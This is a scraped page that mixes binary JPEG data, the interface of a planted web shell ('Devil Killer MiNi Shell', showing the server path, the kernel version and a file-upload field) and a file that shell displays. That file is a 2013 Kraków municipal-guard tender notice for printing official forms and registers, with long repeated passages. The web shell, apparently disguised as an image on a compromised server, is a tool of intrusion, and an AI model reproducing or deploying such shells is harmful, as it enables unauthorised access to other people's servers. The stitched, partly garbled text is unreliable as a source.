JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130123/32032-N-2013.html

<p class="kh_header"><b>Kraków: Drukowanie materiałów służbowych</b><br>
<b>Numer ogłoszenia: 32032 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Drukowanie materiałów służbowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa drukowania materiałów służbowych (druki służbowe, rejestry, notatniki, papier firmowy) zgodnych ze wzorami używanymi przez Straż Miejską Miasta Krakowa.
Część 1 - druki służbowe:
                   Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5

Druk nr 1 - informacja (Założona blokada) w 4 językach OI - 100 bloczków (wzór nr 1)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 2 - informacja (Założona blokada) w 4 językach OII - 100 bloczków (wzór 
nr 2)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 3 - informacja (Założona blokada) w 4 językach OIII - 50 bloczków (wzór 
nr 3)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 4 - informacja (Założona blokada) w 4 językach OIV - 70 bloczków (wzór 
nr 4)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 5 - informacja (Założona blokada) w 4 językach OV - 50 bloczków (wzór nr 5)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 6 - informacja (Założona blokada) w 4 językach OVI - 50 bloczków (wzór 
nr 6)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 7 - dyspozycja usunięcia pojazdu (art. 50a) - 100 bloczków (wzór nr 7)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2 wykonane muszą być 
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33x3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego 
kartonu,  służące jako przekładki.
Druk nr 8 - dyspozycja usunięcia pojazdu  (art. 130a) - 200 bloczków (wzór nr 8)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2  wykonane muszą być 
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33x3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego 
kartonu,  służące jako przekładki.
Druk nr 9 - informacja dla kierowcy - 1 000 bloczków  (wzór nr 9)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50x2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  
kartonu,  służące jako przekładki.
Druk nr 10 - karta rejestracyjna prd-5  - 500 bloczków  (wzór nr 10)
Druki będą wykonane  w formacie A6, na papierze białym, 80g/m2, każda kartka zadrukowana  dwustronne 
w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 szt.  w sposób 
umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  
kartonu,  służące jako przekładki.
Druk nr 11 - protokół doprowadzenia w celu wytrzeźwienia - 2 000  szt. (wzór nr 11)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie 
w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 12 raport dzienny  -  400 bloczków po 50 szt. - (wzór nr 12)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana  dwustronnie w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 kartek w sposób umożliwiający łatwe odrywanie kartek.

 Część 2  - rejestry:
Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5, 79.82.10.00-5

Rejestr nr 1 - książka wydawania - przyjęcia broni i amunicji - 14  szt. (wzór nr 13)
Rejestry  będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez stron tytułowej - 160, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 2 - rejestr rozliczania bloczków mandatowych - 100  szt. (wzór nr 14)
Rejestry będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 50, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 3 - książka odpraw do służby - 40 szt. (wzór nr 15)
Rejestry  będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2,na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką 
muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.

Rejestr nr 4 - zestawienie zdawanych odcinków D mandatów karnych - 60  szt. (wzór nr 16)
Rejestry  będą wykonane w formacie A4 w układzie pionowym, na papierze białym, 80g/m2,  każda kartka
 zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 100, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.

Część 3  - notatniki służbowe - 3000 szt. (wzór nr 17)
Druki będą wykonane  w formacie A6, na papierze białym gramatury 80 g/m2, każda kartka zadrukowana  
dwustronnie w kolorze czarnym. Okładka twarda gramatury min. 200 g/m2 wg wzoru 1, strona tytułowa 
wg wzoru 2, strony ponumerowane, ilość kartek 62, zawartość strony wg wzoru 3. Wszystkie kartki złączone 
w sposób trwały (szycie, klejenie), grzbiet przykryty okładką.

Część 4  - druki firmowe
                Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5

p-1 Komendant Straży Miejskiej Miasta Krakowa - 5 000 szt.  (wzór nr 18)
p-2 SMMK - Oddział II Krowodrza - 1 500 szt. (wzór nr 19)
p-3 SMMK - Oddział III Nowa Huta - 1 500 szt. (wzór nr 20)
p-4 SMMK - Oddział IV Podgórze  - 1 500 szt. (wzór nr 21)
p-5 SMMK - Oddział V Wola Duchacka - 1 500 szt. (wzór nr 22)
p-6 SMMK - Oddział VI Wzgórza Krzesławickie - 1 500 szt. (wzór nr 23)
Każdy rodzaj druku wykonany musi być na papierze białym min. 160 CIE (+/-3), gramatura 90 g/m2, gatunek I.    W nagłówku: pasek kolorze ciemnogranatowym z białymi napisami,  emblemat w kolorze ciemnogranatowym obwiedziony żółtą obwódką, napisy w kolorze żółtym, herb Krakowa zgodnie z kolorystyką. W stopce: wszystkie napisy w kolorze ciemnogranatowym, logo certyfikatu jakości zgodnie z kolorystyką. Przy dostawie każdy rodzaj druku musi być spakowany oddzielnie, w partiach po 500 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli w okresie 9 miesięcy od udzielenia zamówienia podstawowego wystąpi 
konieczność udzielenia zamówień uzupełniających dotychczasowemu Wykonawcy usług, 
stanowiących łącznie nie więcej niż 20% wartości zamówienia podstawowego 
i polegających na powtórzeniu tego samego rodzaju zamówień, to Wykonawca 
zobowiązany jest wykonać tę dostawę, na dodatkowe zamówienie Zamawiającego 
udzielone z wolnej ręki, przy zachowaniu tych samych nośników cenotwórczych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania w postępowaniu oraz zawarcia umowy 
o udzielenie przedmiotowego zamówienia publicznego - w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka 
cywilna).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 08:30, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> druki służbowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk nr 1 - informacja (Założona blokada) w 4 językach OI - 100 bloczków (wzór nr 1)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 2 - informacja (Założona blokada) w 4 językach OII - 100 bloczków (wzór 
nr 2)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 3 - informacja (Założona blokada) w 4 językach OIII - 50 bloczków (wzór 
nr 3)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 4 - informacja (Założona blokada) w 4 językach OIV - 70 bloczków (wzór 
nr 4)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 5 - informacja (Założona blokada) w 4 językach OV - 50 bloczków (wzór nr 5)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 6 - informacja (Założona blokada) w 4 językach OVI - 50 bloczków (wzór 
nr 6)
Druki będą wykonane  w formacie A4, na papierze białym samokopiującym 1+0, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w jednym egzemplarzu. Druki wzdłuż krótszej krawędzi 
muszą być sklejone w bloczki po 100 szt. w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą 
być z obu stron oprawione w okładki ze sztywnego kartonu,  służące jako przekładki.
Druk nr 7 - dyspozycja usunięcia pojazdu (art. 50a) - 100 bloczków (wzór nr 7)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2 wykonane muszą być 
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33x3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego 
kartonu,  służące jako przekładki.
Druk nr 8 - dyspozycja usunięcia pojazdu  (art. 130a) - 200 bloczków (wzór nr 8)
Druki będą wykonane  w formacie A5, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w trzech egzemplarzach, przy czym egzemplarz 1 i 2  wykonane muszą być 
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 33x3 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego 
kartonu,  służące jako przekładki.
Druk nr 9 - informacja dla kierowcy - 1 000 bloczków  (wzór nr 9)
Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana jednostronne w kolorze czarnym, każdy formularz w dwóch egzemplarzach, przy czym pierwszy egzemplarz musi być wykonany  
na papierze samokopiującym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki 50x2 w sposób umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  
kartonu,  służące jako przekładki.
Druk nr 10 - karta rejestracyjna prd-5  - 500 bloczków  (wzór nr 10)
Druki będą wykonane  w formacie A6, na papierze białym, 80g/m2, każda kartka zadrukowana  dwustronne 
w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 szt.  w sposób 
umożliwiający łatwe odrywanie kartek. Bloczki muszą być z obu stron oprawione w okładki ze sztywnego  
kartonu,  służące jako przekładki.
Druk nr 11 - protokół doprowadzenia w celu wytrzeźwienia - 2 000  szt. (wzór nr 11)
Druki będą wykonane w formacie A4 na papierze białym, 80g/m2, każda kartka zadrukowana dwustronnie 
w kolorze czarnym. Przy dostawie druki należy oddzielić przekładkami w partie po 100 szt.
Druk nr 12 raport dzienny  -  400 bloczków po 50 szt. - (wzór nr 12)
